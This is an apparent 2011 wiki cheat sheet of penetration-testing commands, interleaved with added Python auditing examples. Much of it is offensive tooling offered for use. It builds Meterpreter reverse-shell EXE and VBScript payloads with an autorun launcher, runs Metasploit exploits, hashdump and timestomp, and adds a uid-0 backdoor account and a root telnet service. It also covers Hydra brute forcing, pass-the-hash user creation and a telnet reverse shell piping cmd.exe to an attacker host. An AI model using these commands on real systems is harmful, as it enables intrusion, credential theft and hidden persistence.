Difference between revisions of "Linux Commands"
Latest revision as of 09:11, 21 January 2011
Recon
whois
$ whois [-h whois_server] name
nslookup
$ nslookup <target>
dig
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
- Zone transfer
$ dig [@server] <domain> -t AXFR
- Iterative zone transfer
$ dig [@server] <domain> -t IXFR=<N>
BiLE.pl
$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl
snmpwalk
Dump the ARP table of an snmp server at HOST
$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump
Scanning
tcpdump
Parameters
- -n -- use numbers
- -i <interface>
- -v -- be verbose
- -r <file>/-w <file> -- read from/write to file
- -x -- print hex
- -A -- print ASCII
- -X -- print hex and ASCII
- -s <snaplen> -- length to capture (-s0 for all data)
Filter string
- Protocol
- ether, ip, ip6, arp, rarp, tcp, udp
- Type
- host <host>
- net <network>
- port <portnum>
- portrange <start-end>
- Direction
- src
- dst
- Logic
- and
- or
- Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
- Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
- Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10
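The filter grammar listed above, exercised by an added example (not from the original page, and not tcpdump's BPF compiler): a small parser for the protocol / type / direction / logic primitives and an evaluator that runs them over constructed packet summaries, so filter strings such as the three above can be checked against sample traffic without a capture. The field names (l3, l4, src, dst, sport, dport) and the sample packets are my own; `net` takes CIDR notation, and `ether` is accepted by the parser but matches nothing in this model.

```python
import ipaddress

PROTOCOLS = {"ether", "ip", "ip6", "arp", "rarp", "tcp", "udp"}
QUALIFIERS = {"host", "net", "port", "portrange"}


class FilterParser:
    """expr := term ('or' term)*; term := factor ('and' factor)*;
    factor := 'not' factor | '(' expr ')' | primitive"""

    def __init__(self, expr):
        self.toks = expr.replace("(", " ( ").replace(")", " ) ").split()
        self.pos = 0

    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else None

    def take(self):
        tok = self.peek()
        if tok is None:
            raise ValueError("unexpected end of filter")
        self.pos += 1
        return tok

    def parse(self):
        node = self.expr()
        if self.peek() is not None:
            raise ValueError(f"unexpected token {self.peek()!r}")
        return node

    def expr(self):
        node = self.term()
        while self.peek() == "or":
            self.take()
            node = ("or", node, self.term())
        return node

    def term(self):
        node = self.factor()
        while self.peek() == "and":
            self.take()
            node = ("and", node, self.factor())
        return node

    def factor(self):
        if self.peek() == "not":
            self.take()
            return ("not", self.factor())
        if self.peek() == "(":
            self.take()
            node = self.expr()
            if self.take() != ")":
                raise ValueError("missing ')'")
            return node
        return self.primitive()

    def primitive(self):
        tok = self.take()
        if tok in PROTOCOLS:
            return ("proto", tok)
        direction = "any"
        if tok in ("src", "dst"):
            direction, tok = tok, self.take()
        if tok in QUALIFIERS:
            return (tok, direction, self.take())
        if "." in tok or ":" in tok:  # bare address: tcpdump reads it as 'host <addr>'
            return ("host", direction, tok)
        raise ValueError(f"unknown primitive {tok!r}")


def _values(pkt, direction, src_key, dst_key):
    """Field values on the requested side(s) of the packet, None entries dropped."""
    keys = {"src": [src_key], "dst": [dst_key], "any": [src_key, dst_key]}[direction]
    return [pkt[k] for k in keys if pkt.get(k) is not None]


def evaluate(node, pkt):
    kind = node[0]
    if kind == "and":
        return evaluate(node[1], pkt) and evaluate(node[2], pkt)
    if kind == "or":
        return evaluate(node[1], pkt) or evaluate(node[2], pkt)
    if kind == "not":
        return not evaluate(node[1], pkt)
    if kind == "proto":  # ip/ip6/arp/rarp live in l3, tcp/udp in l4; ether is never set here
        return node[1] in (pkt.get("l3"), pkt.get("l4"))
    _, direction, arg = node
    if kind == "host":
        return arg in _values(pkt, direction, "src", "dst")
    if kind == "net":
        network = ipaddress.ip_network(arg, strict=False)
        return any(ipaddress.ip_address(a) in network for a in _values(pkt, direction, "src", "dst"))
    if kind == "port":
        return int(arg) in _values(pkt, direction, "sport", "dport")
    lo, hi = (int(x) for x in arg.split("-"))  # portrange <start-end>
    return any(lo <= p <= hi for p in _values(pkt, direction, "sport", "dport"))


PACKETS = [  # constructed packet summaries, not a real capture
    {"l3": "ip", "l4": "tcp", "src": "192.168.1.5", "dst": "10.10.10.10", "sport": 51000, "dport": 80},
    {"l3": "ip", "l4": "udp", "src": "10.10.10.10", "dst": "192.168.1.5", "sport": 53, "dport": 40000},
    {"l3": "ip", "l4": "tcp", "src": "10.10.10.10", "dst": "192.168.1.5", "sport": 22, "dport": 52000},
    {"l3": "arp", "l4": None, "src": None, "dst": None, "sport": None, "dport": None},
]


def select(expr, packets=PACKETS):
    """Indices of the packets that the filter expression matches."""
    tree = FilterParser(expr).parse()
    return [i for i, p in enumerate(packets) if evaluate(tree, p)]
```

`select("tcp and dst 10.10.10.10")` returns `[0]`, `select("udp and src 10.10.10.10")` returns `[1]`, and `select("tcp and port 80 and host 10.10.10.10")` returns `[0]`; a bare `dst 10.10.10.10` is treated as `dst host`, which is what tcpdump does with an unqualified address.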
hping3
TCP Flags
- --syn, --fin, --rst, --push, --ack, --urg
Target selection
- --rand-dest
- --interface <int>
Source selection
- --spoof <hostname>
- --rand-source
Port selection
- --destport <port>
- --destport +<port> -- increment by one for each packet received
- --destport ++<port> -- increment by one for each packet sent
- --scan <portrange>
- --baseport <port>
- --keep -- don't increment the source port
Speed options
- --fast, --faster, --flood
- --interval <N> -- interval in seconds
- --interval u<N> -- interval in microseconds
Other options
- --count <N>
- --beep
- --file <filename>
- --data <N>
traceroute
Parameters
- -f <N> -- Initial TTL
- -g <hostlist> -- Loose source route
- -I -- use ICMP Echo instead of UDP
- -m <N> -- maximum number of hops (default 30)
- -n -- numeric
- -p <baseport> -- set the base UDP port
- -w <N> -- wait N seconds (default 5)
Layer Four Traceroute (lft)
http://pwhois.org/lft/index.who
Options
- -u -- use UDP
- -p -- use ICMP echo
- -d <port> -- destination port (default 80)
- -s <port> -- source port
- -L <N> -- length (including layer 3/4 header)
- -A -- look up AS number
- -P -- traceroute via tcp
nmap
Pinging
- -PN -- don't ping
- -PB -- default, ICMP Echo + TCP to port 80
- -PE -- ICMP Echo request
- -PS[portlist] -- TCP SYN
- -PP -- ICMP Timestamp request
- -PM -- ICMP Address Mask request
- -PR -- default on subnet, use ARP to identify hosts
Scanning
- -sT -- TCP Connect scan
- -sS -- SYN scan
- -sA -- ACK scan
- -sF -- FIN scan
- -sN -- Null scan
- -sX -- Xmas Tree scan
- -sM -- Maimon scan
- --scanflags -- specify your own flags
- -sU -- UDP scan
Fingerprinting
- -O -- OS fingerprint
- -sV -- Version scan
Scripts
- -sC -- run all scripts
- --script=<category,dir,src,etc>
- --script-trace
Timing
- --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
- --host-timeout, --max-rtt-timeout, --min-rtt-timeout, --initial-rtt-timeout, --max-parallelism, --scan-delay
Other options
- -p<ports>
- -F -- fast (checks only ports in nmap-services)
- --packet-trace
- --traceroute
- --badsum
THC amap
Options
- -q -- quiet (omit closed ports)
- -v -- verbose
- -b -- print banners
Example:
amap -bqv 10.10.10.10 1-50
Enumerating users
Commands
$ cat /etc/passwd
$ finger
$ who
$ w
Remotely:
$ finger @<target>
Exploitation
netcat
Options
- -l -- listen mode
- -L -- listen harder (Windows only)
- -u -- UDP mode
- -p -- local port (in listen mode, the port to listen on)
- -e -- program to execute
- -n -- don't resolve names
- -z -- don't send any data
- -w<N> -- timeout for connects
- -v/-vv -- be verbose
Scanning
echo "" | nc -v -n -w1 <target> <port-range>
Setting up a relay
mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe
Relaying port 22 to the local system
mknod backpipe p
nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe
Finding SetUID/SetGID programs
find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done
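The same check as the find commands above, as an added example in Python (not part of the original cheat sheet): it walks a tree, tests the setuid/setgid bits with stat, and returns the findings as data rather than printing them, so an auditor can diff the current list against an approved baseline and spot a set-id file that was not there before. The demo tree, file names and baseline are constructed in a temporary directory; symlinks are skipped, matching `find -type f`.

```python
import os
import stat
import tempfile


def find_setid_files(root):
    """Regular files under root carrying the setuid or setgid bit, as
    (path, permission bits in octal, 'setuid' / 'setgid' / 'setuid+setgid')."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink is not followed, like find -type f
            except OSError:
                continue  # entry vanished or is unreadable; keep walking
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = [label for flag, label in ((stat.S_ISUID, "setuid"), (stat.S_ISGID, "setgid"))
                    if st.st_mode & flag]
            if bits:
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), "+".join(bits)))
    return sorted(findings)


def new_since_baseline(findings, baseline_paths):
    """Set-id files that are not in an approved baseline: the ones worth a closer look."""
    approved = set(baseline_paths)
    return [f for f in findings if f[0] not in approved]


def relative_kinds(root):
    """{path relative to root: kind} for the findings, convenient for comparing trees."""
    return {os.path.relpath(p, root): kind for p, _mode, kind in find_setid_files(root)}


def build_demo_tree():
    """Constructed tree in a temp dir: a setuid file, a setgid file, a plain file and
    a symlink to the setuid file (which must not be reported a second time)."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("su-copy", 0o4755), ("wall-copy", 0o2755), ("cat-copy", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho demo\n")
        os.chmod(path, mode)
    os.symlink(os.path.join(bindir, "su-copy"), os.path.join(root, "link-to-su"))
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for path, mode, kind in find_setid_files(demo_root):
        print(f"{mode} {kind:13} {path}")
```

Run against `/` the walk takes a while and hits permission errors on other users' directories, which the `OSError` branch skips; saving the returned list after a clean install gives the baseline for `new_since_baseline` on later runs.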
Metasploit
Running an exploit
msf> show exploits
msf> use exploit/windows/smf/ms05_039_php
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit
Interacting with sessions
msf> sessions -l
msf> sessions -i <N>
Creating a malicious VBScript
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V
Creating a malicious Exe
$ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X
$ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X
Example autorun.inf file to run a malicious exe (goes with Metasploit)
[autorun]
open=example.exe
icon=example.exe
Metasploit listener
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E
$ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E
Meterpreter
Filesystem commands
> cd
> lcd
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl <enable/disable> <keyboard/mouse>
Modules
> use <modulename>
> use priv
> hashdump
> timestomp
Creating a user
Adding an ordinary user
useradd <name>
Adding a root user (note: a non-uid-0 account may be required to log in)
useradd -o -u 0 <name>
telnet
Checking for inetd/xinetd
ps aux | grep inetd
Adding telnet to /etc/inetd.conf
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
Adding telnet to xinetd
- Steal the file from a service that's running (files are in /etc/xinetd.d)
- Change server to "/usr/sbin/in.telnetd"
Restarting inetd/xinetd (the "kill" command with the PID can also be used)
killall -HUP inetd
killall -HUP xinetd
sshd
File should be in /etc/rc*. Ways to enable:
chkconfig sshd on
service sshd start
/etc/init.d/sshd start
Passwords
Dictionaries
Creating a dictionary
cat wordlist.txt | sort | uniq > dictionary.txt
Scraping a Web site
mkdir /tmp/source
cd /tmp/source
wget -r -l <N> <target>
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst
Or, just use my dictionaries
Account lockout
grep tally /etc/pam.d/*
grep tally /etc/pam.conf
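The grep above only tells you the word "tally" appears somewhere; whether the auth stack actually enforces a lockout depends on the module being in an `auth` line with a `deny=` threshold. Here is an added example (mine, not from the page) that parses PAM lines, bracketed control fields included, and reports the tally modules in the auth stack with their `deny` / `unlock_time` values. The sample configuration lines are constructed; `pam_tally.so`, `pam_tally2.so` and `pam_faillock.so` are the module names checked, and note that pam_faillock can keep its thresholds in /etc/security/faillock.conf, which this does not read.

```python
TALLY_MODULES = {"pam_tally.so", "pam_tally2.so", "pam_faillock.so"}


def _tokens(line):
    """Split a PAM line on whitespace, keeping a bracketed control field such as
    [success=1 default=ignore] together as one token."""
    toks, buf, depth = [], "", 0
    for ch in line:
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
        if ch.isspace() and depth == 0:
            if buf:
                toks.append(buf)
                buf = ""
        else:
            buf += ch
    if buf:
        toks.append(buf)
    return toks


def parse_pam_line(line, conf_style=False):
    """-> dict(type, control, module, args) or None for blank and comment lines.
    conf_style=True for /etc/pam.conf, whose lines carry the service name first."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    toks = _tokens(line)
    if conf_style:
        toks = toks[1:]
    if len(toks) < 3:
        return None
    args = {}
    for arg in toks[3:]:
        key, _, value = arg.partition("=")
        args[key] = value if value else True  # flags like 'nullok' have no value
    return {"type": toks[0].lstrip("-"), "control": toks[1], "module": toks[2], "args": args}


def lockout_settings(lines, conf_style=False):
    """Tally modules found in the auth stack, with their deny / unlock_time arguments."""
    found = []
    for line in lines:
        entry = parse_pam_line(line, conf_style)
        if entry and entry["type"] == "auth" and entry["module"] in TALLY_MODULES:
            args = entry["args"]
            found.append({
                "module": entry["module"],
                "deny": int(args["deny"]) if "deny" in args else None,
                "unlock_time": int(args["unlock_time"]) if "unlock_time" in args else None,
            })
    return found


def has_lockout(lines, conf_style=False):
    """True when some auth-stack tally module sets a deny threshold on its line."""
    return any(s["deny"] is not None for s in lockout_settings(lines, conf_style))


SAMPLE_PAM_D_LOGIN = [  # constructed, in the style of a /etc/pam.d/<service> file
    "#%PAM-1.0",
    "auth     required   pam_env.so",
    "auth     required   pam_tally2.so deny=5 unlock_time=900 onerr=fail",
    "auth     [success=1 default=ignore] pam_unix.so nullok",
    "account  required   pam_tally2.so",
]
SAMPLE_PAM_D_NO_LOCKOUT = [  # constructed: no tally module at all
    "auth     required   pam_unix.so",
    "account  required   pam_unix.so",
]
SAMPLE_PAM_CONF = [  # constructed, in /etc/pam.conf style (service name first)
    "sshd  auth  required  pam_tally2.so deny=3",
]
```

Reading a real file is `lockout_settings(open("/etc/pam.d/login"))`; an `account` line for the tally module only counts failures and resets them, so it is deliberately not taken as evidence of a lockout policy.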
pw-inspector
Options
- -i -- input file
- -o -- output file
- -m <N> -- minimum length
- -M <N> -- maximum length
- -c <N> -- the number of criteria
- -l -- lower case
- -u -- upper case
- -n -- numbers
- -p -- printable characters (lower/upper/num)
- -s -- special characters (all others)
Example
cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2
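The pw-inspector options above describe a length window plus a count of character classes; this added example (my own Python, not the THC tool's code) implements the same filter so the rule can be applied as a password-policy check rather than only on a cracking list. The class definitions follow the option list, with `-s` "all others" read as any non-alphanumeric character; when `criteria` is not given it is assumed to mean every selected class, and the candidate list is constructed.

```python
import string
import sys

# The five character classes behind pw-inspector's -l -u -n -p -s options.
CLASSES = {
    "l": str.islower,
    "u": str.isupper,
    "n": str.isdigit,
    "p": str.isalnum,                 # printable = lower/upper/num per the option list
    "s": lambda c: not c.isalnum(),   # special = all others
}


def classes_present(word, selected):
    """Which of the selected classes occur at least once in word."""
    return {name for name in selected if any(CLASSES[name](c) for c in word)}


def inspect(words, min_len=0, max_len=None, selected="lunps", criteria=None):
    """Keep words whose length is within [min_len, max_len] and that contain at least
    `criteria` of the selected classes (criteria=None: every selected class, assumed)."""
    need = len(selected) if criteria is None else criteria
    kept = []
    for raw in words:
        word = raw.rstrip("\r\n")
        if len(word) < min_len or (max_len is not None and len(word) > max_len):
            continue
        if len(classes_present(word, selected)) >= need:
            kept.append(word)
    return kept


SAMPLE_LIST = [  # constructed candidates standing in for /tmp/password.list
    "password", "Passw0rd", "abc", "123456", "P@ss", "hunter2", "QWERTYUIOP", "Tr0ub4dor&3",
]


def demo():
    """Equivalent of: cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2"""
    return inspect(SAMPLE_LIST, min_len=6, selected="nul", criteria=2)


if __name__ == "__main__":
    # 'python pwfilter.py -' reads candidates from stdin like the pipeline above;
    # without the dash the constructed list is used.
    source = sys.stdin if len(sys.argv) > 1 and sys.argv[1] == "-" else SAMPLE_LIST
    for word in inspect(source, min_len=6, selected="nul", criteria=2):
        print(word)
```

`demo()` keeps "Passw0rd", "hunter2" and "Tr0ub4dor&3": "password" and "QWERTYUIOP" hit only one class, "123456" only digits, and "abc" and "P@ss" fall under the six-character minimum.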
Hydra
Options
- -l <username>/-L <userfile> -- Login name/file
- -p <password>/-P <passfile> -- Password/file
- -e <n|s|ns> -- extended checks (n = null, s = same as username)
- -t <N> -- thread count
hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]
smb password
hydra <host> smb -l george -P ./list.lst -e ns
ssh password
hydra <host> ssh2 -l george -P ./list.lst -e ns
John
Show cracked passwords
john --show <passwordfile>
Speed test
john --test
Running against a password file
john <passwordfile>
Specifying the hash type
john --format=<format> <passwordfile>
john --format=nt /tmp/pwdump
Combining passwd/shadow
unshadow <passwdfile> <shadowfile> > combined.txt
john combined.txt
Modified Samba
Loading the hash
export SMBHASH="<LANMAN>:<NT>"
echo $SMBHASH
Mounting a drive
./smbmount //<target>/<share> <mountpoint> -o username=<username>
./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator
Adding a user
./net user ADD <username> <password> -I <target> -U <admin_username>
./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username>
Web
nikto.pl
Scanning
nikto.pl -h <host>
Updating
nikto.pl -update
Single check
nikto.pl -Single
Fancy tricks
Double-telnet
On the attacker machine
nc -l -p 4444
nc -l -p 5555
On the victim machine
telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555